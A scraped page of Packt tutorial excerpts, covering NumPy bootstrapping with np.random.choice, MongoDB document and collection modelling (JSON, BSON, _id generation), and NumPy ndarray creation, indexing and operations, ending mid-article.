(x * sigma * np.sqrt(2 * np.pi)) plt.xlim([0, 15]) plt.plot(x, pdf,'--', lw=3, label="PDF") plt.title('Lognormal distribution') plt.xlabel('Value') plt.ylabel('Normalized frequency') plt.grid() plt.legend(loc='best') plt.show() Bootstrapping in statistics Bootstrapping is a method used to estimate variance, accuracy, and other metrics of sample estimates, such as the arithmetic mean. The simplest bootstrapping procedure consists of the following steps: Generate a large number of samples from the original data sample having the same size N. You can think of the original data as a jar containing numbers. We create the new samples by N times randomly picking a number from the jar. Each time we return the number into the jar, so a number can occur multiple times in a generated sample. With the new samples, we calculate the statistical estimate under investigation for each sample (for example, the arithmetic mean). This gives us a sample of possible values for the estimator. Time for action – sampling with numpy.random.choice() We will use the numpy.random.choice() function to perform bootstrapping. 
Start the IPython or Python shell and import NumPy: $ ipython In [1]: import numpy as np Generate a data sample following the normal distribution: In [2]: N = 500   In [3]: np.random.seed(52)   In [4]: data = np.random.normal(size=N)   Calculate the mean of the data: In [5]: data.mean() Out[5]: 0.07253250605445645 Generate 100 samples from the original data and calculate their means (of course, more samples may lead to a more accurate result): In [6]: bootstrapped = np.random.choice(data, size=(N, 100))   In [7]: means = bootstrapped.mean(axis=0)   In [8]: means.shape Out[8]: (100,) Calculate the mean, variance, and standard deviation of the arithmetic means we obtained: In [9]: means.mean() Out[9]: 0.067866373318115278   In [10]: means.var() Out[10]: 0.001762807104774598   In [11]: means.std() Out[11]: 0.041985796464692651 If we are assuming a normal distribution for the means, it may be relevant to know the z-score, which is defined as follows: In [12]: (data.mean() - means.mean())/means.std() Out[12]: 0.11113598238549766 From the z-score value, we get an idea of how probable the actual mean is. What just happened? We bootstrapped a data sample by generating samples and calculating the means of each sample. Then we computed the mean, standard deviation, variance, and z-score of the means. We used the numpy.random.choice() function for bootstrapping. Summary You learned a lot in this article about NumPy modules. We covered linear algebra, the Fast Fourier transform, continuous and discrete distributions, and random numbers. Resources for Article: Further resources on this subject: SciPy for Signal Processing [article] Visualization [article] The plot function [article]


Documents and Collections in Data Modeling with MongoDB

Packt
22 Jun 2015
12 min read
In this article by Wilson da Rocha França, author of the book, MongoDB Data Modeling, we will cover documents and collections used in data modeling with MongoDB. (For more resources related to this topic, see here.) Data modeling is a very important process during the conception of an application since this step will help you to define the necessary requirements for the database's construction. This definition is precisely the result of the data understanding acquired during the data modeling process. As previously described, this process, regardless of the chosen data model, is commonly divided into two phases: one that is very close to the user's view and the other that is a translation of this view to a conceptual schema. In the scenario of relational database modeling, the main challenge is to build a robust database from these two phases, with the aim of guaranteeing updates to it with any impact during the application's lifecycle. A big advantage of NoSQL compared to relational databases is that NoSQL databases are more flexible at this point, due to the possibility of a schema-less model that, in theory, can cause less impact on the user's view if a modification in the data model is needed. Despite the flexibility NoSQL offers, it is important to previously know how we will use the data in order to model a NoSQL database. It is a good idea not to plan the data format to be persisted, even in a NoSQL database. Moreover, at first sight, this is the point where database administrators, quite used to the relational world, become more uncomfortable. Relational database standards, such as SQL, brought us a sense of security and stability by setting up rules, norms, and criteria. On the other hand, we will dare to state that this security turned database designers distant of the domain from which the data to be stored is drawn. The same thing happened with application developers. There is a notable divergence of interests among them and database administrators, especially regarding data models. The NoSQL databases practically bring the need for an approximation between database professionals and the applications, and also the need for an approximation between developers and databases. For that reason, even though you may be a data modeler/designer or a database administrator, don't be scared if from now on we address subjects that are out of your comfort zone. Be prepared to start using words common from the application developer's point of view, and add them to your vocabulary. This article will cover the following: Introducing your documents and collections The document's characteristics and structure Introducing documents and collections MongoDB has the document as a basic unity of data. The documents in MongoDB are represented in JavaScript Object Notation (JSON). Collections are groups of documents. Making an analogy, a collection is similar to a table in a relational model and a document is a record in this table. And finally, collections belong to a database in MongoDB. The documents are serialized on disk in a format known as Binary JSON (BSON), a binary representation of a JSON document. An example of a document is: {    "_id": 123456,    "firstName": "John",    "lastName": "Clay",    "age": 25,    "address": {      "streetAddress": "131 GEN. 
Almério de Moura Street",      "city": "Rio de Janeiro",      "state": "RJ",      "postalCode": "20921060"    },    "phoneNumber":[      {          "type": "home",          "number": "+5521 2222-3333"      },      {          "type": "mobile",          "number": "+5521 9888-7777"      }    ] } Unlike the relational model, where you must declare a table structure, a collection doesn't enforce a certain structure for a document. It is possible that a collection contains documents with completely different structures. We can have, for instance, on the same users collection: {    "_id": "123456",    "username": "johnclay",    "age": 25,    "friends":[      {"username": "joelsant"},      {"username": "adilsonbat"}    ],    "active": true,    "gender": "male" } We can also have: {    "_id": "654321",    "username": "santymonty",    "age": 25,    "active": true,    "gender": "male",    "eyeColor": "brown" } In addition to this, another interesting feature of MongoDB is that not just data is represented by documents. Basically, all user interactions with MongoDB are made through documents. Besides data recording, documents are a means to: Define what data can be read, written, and/or updated in queries Define which fields will be updated Create indexes Configure replication Query the information from the database Before we go deep into the technical details of documents, let's explore their structure. JSON JSON is a text format for the open-standard representation of data and that is ideal for data traffic. To explore the JSON format deeper, you can check ECMA-404 The JSON Data Interchange Standard where the JSON format is fully described. JSON is described by two standards: ECMA-404 and RFC 7159. The first one puts more focus on the JSON grammar and syntax, while the second provides semantic and security considerations. As the name suggests, JSON arises from the JavaScript language. It came about as a solution for object state transfers between the web server and the browser. Despite being part of JavaScript, it is possible to find generators and readers for JSON in almost all the most popular programming languages such as C, Java, and Python. The JSON format is also considered highly friendly and human-readable. JSON does not depend on the platform chosen, and its specification are based on two data structures: A set or group of key/value pairs A value ordered list So, in order to clarify any doubts, let's talk about objects. Objects are a non-ordered collection of key/value pairs that are represented by the following pattern: {    "key" : "value" } In relation to the value ordered list, a collection is represented as follows: ["value1", "value2", "value3"] In the JSON specification, a value can be: A string delimited with " " A number, with or without a sign, on a decimal base (base 10). This number can have a fractional part, delimited by a period (.), or an exponential part followed by e or E Boolean values (true or false) A null value Another object Another value ordered array The following diagram shows us the JSON value structure: Here is an example of JSON code that describes a person: {    "name" : "Han",    "lastname" : "Solo",    "position" : "Captain of the Millenium Falcon",    "species" : "human",    "gender":"male",    "height" : 1.8 } BSON BSON means Binary JSON, which, in other words, means binary-encoded serialization for JSON documents. If you are seeking more knowledge on BSON, I suggest you take a look at the BSON specification on http://bsonspec.org/. 
If we compare BSON to the other binary formats, BSON has the advantage of being a model that allows you more flexibility. Also, one of its characteristics is that it's lightweight—a feature that is very important for data transport on the Web. The BSON format was designed to be easily navigable and both encoded and decoded in a very efficient way for most of the programming languages that are based on C. This is the reason why BSON was chosen as the data format for MongoDB disk persistence. The types of data representation in BSON are: String UTF-8 (string) Integer 32-bit (int32) Integer 64-bit (int64) Floating point (double) Document (document) Array (document) Binary data (binary) Boolean false (x00 or byte 0000 0000) Boolean true (x01 or byte 0000 0001) UTC datetime (int64)—the int64 is UTC milliseconds since the Unix epoch Timestamp (int64)—this is the special internal type used by MongoDB replication and sharding; the first 4 bytes are an increment, and the last 4 are a timestamp Null value () Regular expression (cstring) JavaScript code (string) JavaScript code w/scope (code_w_s) Min key()—the special type that compares a lower value than all other possible BSON element values Max key()—the special type that compares a higher value than all other possible BSON element values ObjectId (byte*12) Characteristics of documents Before we go into detail about how we must model documents, we need a better understanding of some of its characteristics. These characteristics can determine your decision about how the document must be modeled. The document size We must keep in mind that the maximum length for a BSON document is 16 MB. According to BSON specifications, this length is ideal for data transfers through the Web and to avoid the excessive use of RAM. But this is only a recommendation. Nowadays, a document can exceed the 16 MB length by using GridFS. GridFS allows us to store documents in MongoDB that are larger than the BSON maximum size, by dividing it into parts, or chunks. Each chunk is a new document with 255 K of size. Names and values for a field in a document There are a few things that you must know about names and values for fields in a document. First of all, any field's name in a document is a string. As usual, we have some restrictions on field names. They are: The _id field is reserved for a primary key You cannot start the name using the character $ The name cannot have a null character, or (.) Additionally, documents that have indexed fields must respect the size limit for an indexed field. The values cannot exceed the maximum size of 1,024 bytes. The document primary key As seen in the preceding section, the _id field is reserved for the primary key. By default, this field must be the first one in the document, even when, during an insertion, it is not the first field to be inserted. In these cases, MongoDB moves it to the first position. Also, by definition, it is in this field that a unique index will be created. The _id field can have any value that is a BSON type, except the array. Moreover, if a document is created without an indication of the _id field, MongoDB will automatically create an _id field of the ObjectId type. However, this is not the only option. You can use any value you want to identify your document as long as it is unique. There is another option, that is, generating an auto-incremental value based on a support collection or on an optimistic loop. 
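Before moving on to those two approaches, a quick way to see the default _id behaviour described above is from a driver. The following is a minimal sketch, assuming pymongo is installed and a mongod instance is listening on the default localhost port; the database, collection, and field values are illustrative:

from pymongo import MongoClient

client = MongoClient()                 # assumes mongod on localhost:27017
users = client.test.users

# No _id supplied: MongoDB generates an ObjectId, which becomes the primary key.
result = users.insert_one({"username": "johnclay", "age": 25})
print(result.inserted_id)              # for example, ObjectId('5d9f1b2e...')

# An explicit _id of any BSON type except an array is accepted, as long as it is unique.
users.insert_one({"_id": 123456, "username": "santymonty"})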
Support collections In this method, we use a separate collection that will keep the last used value in the sequence. To increment the sequence, first we should query the last used value. After this, we can use the operator $inc to increment the value. There is a collection called system.js that can keep the JavaScript code in order to reuse it. Be careful not to include application logic in this collection. Let's see an example for this method: db.counters.insert(    {      _id: "userid",      seq: 0    } )   function getNextSequence(name) {    var ret = db.counters.findAndModify(          {            query: { _id: name },            update: { $inc: { seq: 1 } },            new: true          }    );    return ret.seq; }   db.users.insert(    {      _id: getNextSequence("userid"),      name: "Sarah C."    } ) The optimistic loop The generation of the _id field by an optimistic loop is done by incrementing each iteration and, after that, attempting to insert it in a new document: function insertDocument(doc, targetCollection) {    while (1) {        var cursor = targetCollection.find( {},         { _id: 1 } ).sort( { _id: -1 } ).limit(1);        var seq = cursor.hasNext() ? cursor.next()._id + 1 : 1;        doc._id = seq;        var results = targetCollection.insert(doc);        if( results.hasWriteError() ) {            if( results.writeError.code == 11000 /* dup key */ )                continue;            else                print( "unexpected error inserting data: " +                 tojson( results ) );        }        break;    } } In this function, the iteration does the following: Searches in targetCollection for the maximum value for _id. Settles the next value for _id. Sets the value on the document to be inserted. Inserts the document. In the case of errors due to duplicated _id fields, the loop repeats itself, or else the iteration ends. The points demonstrated here are the basics to understanding all the possibilities and approaches that this tool can offer. But, although we can use auto-incrementing fields for MongoDB, we must avoid using them because this tool does not scale for a huge data mass. Summary In this article, you saw how to build documents in MongoDB, examined their characteristics, and saw how they are organized into collections. Resources for Article: Further resources on this subject: Apache Solr and Big Data – integration with MongoDB [article] About MongoDB [article] Creating a RESTful API [article]


The pandas Data Structures

Packt
22 Jun 2015
25 min read
This article by Femi Anthony, author of the book Mastering pandas, starts by taking a tour of NumPy ndarrays, a data structure that belongs to NumPy rather than pandas. Knowledge of NumPy ndarrays is useful as it forms the foundation for the pandas data structures. Another key benefit of NumPy arrays is that they execute what are known as vectorized operations, operations that would otherwise require traversing or looping over a Python list, much faster. In this article, I will present the material via numerous examples using IPython, an interactive interface that allows the user to type commands directly to the Python interpreter. (For more resources related to this topic, see here.)
NumPy ndarrays
The NumPy library is a very important package used for numerical computing with Python. Its primary features include the following:
The type numpy.ndarray, a homogeneous multidimensional array
Access to numerous mathematical functions, such as linear algebra and statistics
The ability to integrate C, C++, and Fortran code
For more information about NumPy, see http://www.numpy.org.
The primary data structure in NumPy is the array class ndarray. It is a homogeneous multi-dimensional (n-dimensional) table of elements, which are indexed by integers just as in a normal array. However, numpy.ndarray (usually created via the numpy.array function) is different from the standard Python array.array class, which offers much less functionality. More information on the various operations is provided at http://scipy-lectures.github.io/intro/numpy/array_object.html.
NumPy array creation
NumPy arrays can be created in a number of ways via calls to various NumPy functions.
NumPy arrays via numpy.array
NumPy arrays can be created via the numpy.array constructor directly:
In [1]: import numpy as np
In [2]: ar1=np.array([0,1,2,3]) # 1 dimensional array
In [3]: ar2=np.array([[0,3,5],[2,8,7]]) # 2D array
In [4]: ar1
Out[4]: array([0, 1, 2, 3])
In [5]: ar2
Out[5]: array([[0, 3, 5],
               [2, 8, 7]])
The shape of the array is given via ndarray.shape:
In [5]: ar2.shape
Out[5]: (2, 3)
The number of dimensions is obtained using ndarray.ndim:
In [7]: ar2.ndim
Out[7]: 2
NumPy array via numpy.arange
np.arange is the NumPy version of Python's range function:
In [10]: # produces the integers from 0 to 11, not inclusive of 12
         ar3=np.arange(12); ar3
Out[10]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])
In [11]: # start, end (exclusive), step size
         ar4=np.arange(3,10,3); ar4
Out[11]: array([3, 6, 9])
NumPy array via numpy.linspace
np.linspace generates evenly spaced elements between the start and the end:
In [13]: # args - start element, end element, number of elements
         ar5=np.linspace(0,2.0/3,4); ar5
Out[13]: array([ 0., 0.22222222, 0.44444444, 0.66666667])
NumPy array via various other functions
These functions include numpy.zeros, numpy.ones, numpy.eye, numpy.random.rand, numpy.random.randn, and numpy.empty. The shape argument must be a tuple in each case, except for the random functions, which take the dimensions as separate arguments. For a 1D array, you can just specify the number of elements; there is no need for a tuple.
numpy.ones
The following command line explains the function:
In [14]: # Produces 2x3x2 array of 1's.
         ar7=np.ones((2,3,2)); ar7
Out[14]: array([[[ 1., 1.],
                 [ 1., 1.],
                 [ 1., 1.]],
                [[ 1., 1.],
                 [ 1., 1.],
                 [ 1., 1.]]])
numpy.zeros
The following command line explains the function:
In [15]: # Produce 4x2 array of zeros.
         ar8=np.zeros((4,2)); ar8
Out[15]: array([[ 0., 0.],
                [ 0., 0.],
                [ 0., 0.],
                [ 0., 0.]])
numpy.eye
The following command line explains the function:
In [17]: # Produces identity matrix
         ar9 = np.eye(3); ar9
Out[17]: array([[ 1., 0., 0.],
                [ 0., 1., 0.],
                [ 0., 0., 1.]])
numpy.diag
The following command line explains the function:
In [18]: # Create diagonal array
         ar10=np.diag((2,1,4,6)); ar10
Out[18]: array([[2, 0, 0, 0],
                [0, 1, 0, 0],
                [0, 0, 4, 0],
                [0, 0, 0, 6]])
numpy.random.rand
The following command line explains the function:
In [19]: # Using the rand, randn functions
         # rand(m) produces m uniformly distributed random numbers in the range 0 to 1
         np.random.seed(100)   # Set seed
         ar11=np.random.rand(3); ar11
Out[19]: array([ 0.54340494, 0.27836939, 0.42451759])
In [20]: # randn(m) produces m normally distributed (Gaussian) random numbers
         ar12=np.random.randn(5); ar12
Out[20]: array([ 0.35467445, -0.78606433, -0.2318722 , 0.20797568, 0.93580797])
numpy.empty
Using np.empty to create an uninitialized array is a cheaper and faster way to allocate an array than using np.ones or np.zeros (malloc versus calloc). However, you should only use it if you're sure that all the elements will be initialized later:
In [21]: ar13=np.empty((3,2)); ar13
Out[21]: array([[ -2.68156159e+154,   1.28822983e-231],
                [ 4.22764845e-307,   2.78310358e-309],
                [ 2.68156175e+154,   4.17201483e-309]])
numpy.tile
The np.tile function allows one to construct an array from a smaller array by repeating it several times on the basis of a parameter:
In [334]: np.array([[1,2],[6,7]])
Out[334]: array([[1, 2],
                 [6, 7]])
In [335]: np.tile(np.array([[1,2],[6,7]]),3)
Out[335]: array([[1, 2, 1, 2, 1, 2],
                 [6, 7, 6, 7, 6, 7]])
In [336]: np.tile(np.array([[1,2],[6,7]]),(2,2))
Out[336]: array([[1, 2, 1, 2],
                 [6, 7, 6, 7],
                 [1, 2, 1, 2],
                 [6, 7, 6, 7]])
NumPy datatypes
We can specify the type of contents of a numeric array by using the dtype parameter:
In [50]: ar=np.array([2,-1,6,3],dtype='float'); ar
Out[50]: array([ 2., -1., 6., 3.])
In [51]: ar.dtype
Out[51]: dtype('float64')
In [52]: ar=np.array([2,4,6,8]); ar.dtype
Out[52]: dtype('int64')
In [53]: ar=np.array([2.,4,6,8]); ar.dtype
Out[53]: dtype('float64')
The default dtype for NumPy's array creation functions is float. In the case of strings, dtype is the length of the longest string in the array:
In [56]: sar=np.array(['Goodbye','Welcome','Tata','Goodnight']); sar.dtype
Out[56]: dtype('S9')
You cannot create variable-length strings in NumPy, since NumPy needs to know how much space to allocate for the string. dtypes can also be Boolean values, complex numbers, and so on:
In [57]: bar=np.array([True, False, True]); bar.dtype
Out[57]: dtype('bool')
The datatype of an ndarray can be changed in much the same way as we cast in other languages such as Java or C/C++, for example, float to int. The mechanism to do this is the numpy.ndarray.astype() function. Here is an example:
In [3]: f_ar = np.array([3,-2,8.18])
        f_ar
Out[3]: array([ 3. , -2. , 8.18])
In [4]: f_ar.astype(int)
Out[4]: array([ 3, -2, 8])
More information on casting can be found in the official documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.astype.html.
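As a quick, self-contained sketch of how dtype and astype() work together (the variable names below are our own, not taken from the book's examples), the following snippet upcasts an integer array to float and then truncates it back; note that astype() always returns a new array rather than converting in place:
import numpy as np

ints = np.arange(4)              # dtype is an integer type, for example int64
floats = ints.astype('float64')  # array([ 0., 1., 2., 3.])
floats[1] = 1.9
back = floats.astype(int)        # array([0, 1, 2, 3]) - astype() truncates rather than rounds
print(back.dtype)                # an integer dtype again; the original ints array is unchanged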
NumPy indexing and slicing Array indices in NumPy start at 0, as in languages such as Python, Java, and C++ and unlike in Fortran, Matlab, and Octave, which start at 1. Arrays can be indexed in the standard way as we would index into any other Python sequences: # print entire array, element 0, element 1, last element. In [36]: ar = np.arange(5); print ar; ar[0], ar[1], ar[-1] [0 1 2 3 4] Out[36]: (0, 1, 4) # 2nd, last and 1st elements In [65]: ar=np.arange(5); ar[1], ar[-1], ar[0] Out[65]: (1, 4, 0) Arrays can be reversed using the ::-1 idiom as follows: In [24]: ar=np.arange(5); ar[::-1] Out[24]: array([4, 3, 2, 1, 0]) Multi-dimensional arrays are indexed using tuples of integers: In [71]: ar = np.array([[2,3,4],[9,8,7],[11,12,13]]); ar Out[71]: array([[ 2, 3, 4],                [ 9, 8, 7],                [11, 12, 13]]) In [72]: ar[1,1] Out[72]: 8 Here, we set the entry at row1 and column1 to 5: In [75]: ar[1,1]=5; ar Out[75]: array([[ 2, 3, 4],                [ 9, 5, 7],                [11, 12, 13]]) Retrieve row 2: In [76]: ar[2] Out[76]: array([11, 12, 13]) In [77]: ar[2,:] Out[77]: array([11, 12, 13]) Retrieve column 1: In [78]: ar[:,1] Out[78]: array([ 3, 5, 12]) If an index is specified that is out of bounds of the range of an array, IndexError will be raised: In [6]: ar = np.array([0,1,2]) In [7]: ar[5]    ---------------------------------------------------------------------------    IndexError                 Traceback (most recent call last) <ipython-input-7-8ef7e0800b7a> in <module>()    ----> 1 ar[5]      IndexError: index 5 is out of bounds for axis 0 with size 3 Thus, for 2D arrays, the first dimension denotes rows and the second dimension, the columns. The colon (:) denotes selection across all elements of the dimension. Array slicing Arrays can be sliced using the following syntax: ar[startIndex: endIndex: stepValue]. In [82]: ar=2*np.arange(6); ar Out[82]: array([ 0, 2, 4, 6, 8, 10]) In [85]: ar[1:5:2] Out[85]: array([2, 6]) Note that if we wish to include the endIndex value, we need to go above it, as follows: In [86]: ar[1:6:2] Out[86]: array([ 2, 6, 10]) Obtain the first n-elements using ar[:n]: In [91]: ar[:4] Out[91]: array([0, 2, 4, 6]) The implicit assumption here is that startIndex=0, step=1. Start at element 4 until the end: In [92]: ar[4:] Out[92]: array([ 8, 10]) Slice array with stepValue=3: In [94]: ar[::3] Out[94]: array([0, 6]) To illustrate the scope of indexing in NumPy, let us refer to this illustration, which is taken from a NumPy lecture given at SciPy 2013 and can be found at http://bit.ly/1GxCDpC: Let us now examine the meanings of the expressions in the preceding image: The expression a[0,3:5] indicates the start at row 0, and columns 3-5, where column 5 is not included. In the expression a[4:,4:], the first 4 indicates the start at row 4 and will give all columns, that is, the array [[40, 41,42,43,44,45] [50,51,52,53,54,55]]. The second 4 shows the cutoff at the start of column 4 to produce the array [[44, 45], [54, 55]]. The expression a[:,2] gives all rows from column 2. Now, in the last expression a[2::2,::2], 2::2 indicates that the start is at row 2 and the step value here is also 2. This would give us the array [[20, 21, 22, 23, 24, 25], [40, 41, 42, 43, 44, 45]]. Further, ::2 specifies that we retrieve columns in steps of 2, producing the end result array ([[20, 22, 24], [40, 42, 44]]). 
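If you would like to check the expressions from the preceding illustration yourself, the array in the picture can be rebuilt with a plain call to np.array (this reconstruction is ours; only the picture appears in the original lecture slide):
import numpy as np

# Element [i, j] of the illustrated array equals 10*i + j
a = np.array([[10*i + j for j in range(6)] for i in range(6)])

a[0, 3:5]     # array([3, 4])
a[4:, 4:]     # array([[44, 45], [54, 55]])
a[:, 2]       # array([ 2, 12, 22, 32, 42, 52])
a[2::2, ::2]  # array([[20, 22, 24], [40, 42, 44]])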
Assignment and slicing can be combined as shown in the following code snippet: In [96]: ar Out[96]: array([ 0, 2, 4, 6, 8, 10]) In [100]: ar[:3]=1; ar Out[100]: array([ 1, 1, 1, 6, 8, 10]) In [110]: ar[2:]=np.ones(4);ar Out[110]: array([1, 1, 1, 1, 1, 1]) Array masking Here, NumPy arrays can be used as masks to select or filter out elements of the original array. For example, see the following snippet: In [146]: np.random.seed(10)          ar=np.random.random_integers(0,25,10); ar Out[146]: array([ 9, 4, 15, 0, 17, 25, 16, 17, 8, 9]) In [147]: evenMask=(ar % 2==0); evenMask Out[147]: array([False, True, False, True, False, False, True, False, True, False], dtype=bool) In [148]: evenNums=ar[evenMask]; evenNums Out[148]: array([ 4, 0, 16, 8]) In the following example, we randomly generate an array of 10 integers between 0 and 25. Then, we create a Boolean mask array that is used to filter out only the even numbers. This masking feature can be very useful, say for example, if we wished to eliminate missing values, by replacing them with a default value. Here, the missing value '' is replaced by 'USA' as the default country. Note that '' is also an empty string: In [149]: ar=np.array(['Hungary','Nigeria',                        'Guatemala','','Poland',                        '','Japan']); ar Out[149]: array(['Hungary', 'Nigeria', 'Guatemala',                  '', 'Poland', '', 'Japan'],                  dtype='|S9') In [150]: ar[ar=='']='USA'; ar Out[150]: array(['Hungary', 'Nigeria', 'Guatemala', 'USA', 'Poland', 'USA', 'Japan'], dtype='|S9') Arrays of integers can also be used to index an array to produce another array. Note that this produces multiple values; hence, the output must be an array of type ndarray. This is illustrated in the following snippet: In [173]: ar=11*np.arange(0,10); ar Out[173]: array([ 0, 11, 22, 33, 44, 55, 66, 77, 88, 99]) In [174]: ar[[1,3,4,2,7]] Out[174]: array([11, 33, 44, 22, 77]) In the preceding code, the selection object is a list and elements at indices 1, 3, 4, 2, and 7 are selected. Now, assume that we change it to the following: In [175]: ar[1,3,4,2,7] We get an IndexError error since the array is 1D and we're specifying too many indices to access it. IndexError         Traceback (most recent call last) <ipython-input-175-adbcbe3b3cdc> in <module>() ----> 1 ar[1,3,4,2,7]   IndexError: too many indices This assignment is also possible with array indexing, as follows: In [176]: ar[[1,3]]=50; ar Out[176]: array([ 0, 50, 22, 50, 44, 55, 66, 77, 88, 99]) When a new array is created from another array by using a list of array indices, the new array has the same shape. Complex indexing Here, we illustrate the use of complex indexing to assign values from a smaller array into a larger one: In [188]: ar=np.arange(15); ar Out[188]: array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])   In [193]: ar2=np.arange(0,-10,-1)[::-1]; ar2 Out[193]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0]) Slice out the first 10 elements of ar, and replace them with elements from ar2, as follows: In [194]: ar[:10]=ar2; ar Out[194]: array([-9, -8, -7, -6, -5, -4, -3, -2, -1, 0, 10, 11, 12, 13, 14]) Copies and views A view on a NumPy array is just a particular way of portraying the data it contains. Creating a view does not result in a new copy of the array, rather the data it contains may be arranged in a specific order, or only certain data rows may be shown. 
Thus, if data is replaced on the underlying array's data, this will be reflected in the view whenever the data is accessed via indexing. The initial array is not copied into the memory during slicing and is thus more efficient. The np.may_share_memory method can be used to see if two arrays share the same memory block. However, it should be used with caution as it may produce false positives. Modifying a view modifies the original array: In [118]:ar1=np.arange(12); ar1 Out[118]:array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])   In [119]:ar2=ar1[::2]; ar2 Out[119]: array([ 0, 2, 4, 6, 8, 10])   In [120]: ar2[1]=-1; ar1 Out[120]: array([ 0, 1, -1, 3, 4, 5, 6, 7, 8, 9, 10, 11]) To force NumPy to copy an array, we use the np.copy function. As we can see in the following array, the original array remains unaffected when the copied array is modified: In [124]: ar=np.arange(8);ar Out[124]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [126]: arc=ar[:3].copy(); arc Out[126]: array([0, 1, 2])   In [127]: arc[0]=-1; arc Out[127]: array([-1, 1, 2])   In [128]: ar Out[128]: array([0, 1, 2, 3, 4, 5, 6, 7]) Operations Here, we present various operations in NumPy. Basic operations Basic arithmetic operations work element-wise with scalar operands. They are - +, -, *, /, and **. In [196]: ar=np.arange(0,7)*5; ar Out[196]: array([ 0, 5, 10, 15, 20, 25, 30])   In [198]: ar=np.arange(5) ** 4 ; ar Out[198]: array([ 0,   1, 16, 81, 256])   In [199]: ar ** 0.5 Out[199]: array([ 0.,   1.,   4.,   9., 16.]) Operations also work element-wise when another array is the second operand as follows: In [209]: ar=3+np.arange(0, 30,3); ar Out[209]: array([ 3, 6, 9, 12, 15, 18, 21, 24, 27, 30])   In [210]: ar2=np.arange(1,11); ar2 Out[210]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) Here, in the following snippet, we see element-wise subtraction, division, and multiplication: In [211]: ar-ar2 Out[211]: array([ 2, 4, 6, 8, 10, 12, 14, 16, 18, 20])   In [212]: ar/ar2 Out[212]: array([3, 3, 3, 3, 3, 3, 3, 3, 3, 3])   In [213]: ar*ar2 Out[213]: array([ 3, 12, 27, 48, 75, 108, 147, 192, 243, 300]) It is much faster to do this using NumPy rather than pure Python. The %timeit function in IPython is known as a magic function and uses the Python timeit module to time the execution of a Python statement or expression, explained as follows: In [214]: ar=np.arange(1000)          %timeit a**3          100000 loops, best of 3: 5.4 µs per loop   In [215]:ar=range(1000)          %timeit [ar[i]**3 for i in ar]          1000 loops, best of 3: 199 µs per loop Array multiplication is not the same as matrix multiplication; it is element-wise, meaning that the corresponding elements are multiplied together. For matrix multiplication, use the dot operator. For more information refer to http://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html. 
In [228]: ar=np.array([[1,1],[1,1]]); ar Out[228]: array([[1, 1],                  [1, 1]])   In [230]: ar2=np.array([[2,2],[2,2]]); ar2 Out[230]: array([[2, 2],                  [2, 2]])   In [232]: ar.dot(ar2) Out[232]: array([[4, 4],                  [4, 4]]) Comparisons and logical operations are also element-wise: In [235]: ar=np.arange(1,5); ar Out[235]: array([1, 2, 3, 4])   In [238]: ar2=np.arange(5,1,-1);ar2 Out[238]: array([5, 4, 3, 2])   In [241]: ar < ar2 Out[241]: array([ True, True, False, False], dtype=bool)   In [242]: l1 = np.array([True,False,True,False])          l2 = np.array([False,False,True, False])          np.logical_and(l1,l2) Out[242]: array([False, False, True, False], dtype=bool) Other NumPy operations such as log, sin, cos, and exp are also element-wise: In [244]: ar=np.array([np.pi, np.pi/2]); np.sin(ar) Out[244]: array([ 1.22464680e-16,   1.00000000e+00]) Note that for element-wise operations on two NumPy arrays, the two arrays must have the same shape, else an error will result since the arguments of the operation must be the corresponding elements in the two arrays: In [245]: ar=np.arange(0,6); ar Out[245]: array([0, 1, 2, 3, 4, 5])   In [246]: ar2=np.arange(0,8); ar2 Out[246]: array([0, 1, 2, 3, 4, 5, 6, 7])   In [247]: ar*ar2          ---------------------------------------------------------------------------          ValueError                              Traceback (most recent call last)          <ipython-input-247-2c3240f67b63> in <module>()          ----> 1 ar*ar2          ValueError: operands could not be broadcast together with shapes (6) (8) Further, NumPy arrays can be transposed as follows: In [249]: ar=np.array([[1,2,3],[4,5,6]]); ar Out[249]: array([[1, 2, 3],                  [4, 5, 6]])   In [250]:ar.T Out[250]:array([[1, 4],                [2, 5],                [3, 6]])   In [251]: np.transpose(ar) Out[251]: array([[1, 4],                 [2, 5],                  [3, 6]]) Suppose we wish to compare arrays not element-wise, but array-wise. We could achieve this as follows by using the np.array_equal operator: In [254]: ar=np.arange(0,6)          ar2=np.array([0,1,2,3,4,5])          np.array_equal(ar, ar2) Out[254]: True Here, we see that a single Boolean value is returned instead of a Boolean array. The value is True only if all the corresponding elements in the two arrays match. The preceding expression is equivalent to the following: In [24]: np.all(ar==ar2) Out[24]: True Reduction operations Operators such as np.sum and np.prod perform reduces on arrays; that is, they combine several elements into a single value: In [257]: ar=np.arange(1,5)          ar.prod() Out[257]: 24 In the case of multi-dimensional arrays, we can specify whether we want the reduction operator to be applied row-wise or column-wise by using the axis parameter: In [259]: ar=np.array([np.arange(1,6),np.arange(1,6)]);ar Out[259]: array([[1, 2, 3, 4, 5],                 [1, 2, 3, 4, 5]]) # Columns In [261]: np.prod(ar,axis=0) Out[261]: array([ 1, 4, 9, 16, 25]) # Rows In [262]: np.prod(ar,axis=1) Out[262]: array([120, 120]) In the case of multi-dimensional arrays, not specifying an axis results in the operation being applied to all elements of the array as explained in the following example: In [268]: ar=np.array([[2,3,4],[5,6,7],[8,9,10]]); ar.sum() Out[268]: 54   In [269]: ar.mean() Out[269]: 6.0 In [271]: np.median(ar) Out[271]: 6.0 Statistical operators These operators are used to apply standard statistical operations to a NumPy array. 
